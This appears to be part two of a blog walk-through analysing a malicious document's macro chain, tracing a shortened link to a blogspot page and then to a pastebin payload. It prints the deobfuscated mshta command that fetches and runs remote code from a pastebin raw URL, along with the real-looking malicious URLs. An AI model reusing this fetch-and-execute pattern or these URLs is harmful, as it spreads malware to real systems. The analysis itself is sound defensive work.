Continuing our walk-through, we now get outside of the document itself and see what happens next.
Part 1: Getting through the macros.
We left off with the macro running this command:
This means we must know what happens next. Using whatever site/mechanism you use to expand shortened links, you will see that the URL takes you to a blogspot site of all things.
PS C:\path\to\wherever> Invoke-WebRequest -Uri "https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html" -OutFile "C:\Path\to\wherever\site.html"
Anyway, line 15 (var Zwk) is where the string gets put together. Line 18 (var AS_ww) contains the completed string and is where it is executed. After a little bit of analysis you can see this command being run:
12. AS_ww1 = http://www.pastebin.com/raw/ 13. AS_ww0 = mshta 14. AS_ww2 = qykTeRnR 17. AS_ww = http://www.pastebin.com/raw/qykTeRnR
So download what’s on pastebin and execute it? Looks like we’re headed to pastebin!
This script is split up into four distinct parts. We’ll look at each of them in turn in the next post.
To part 3!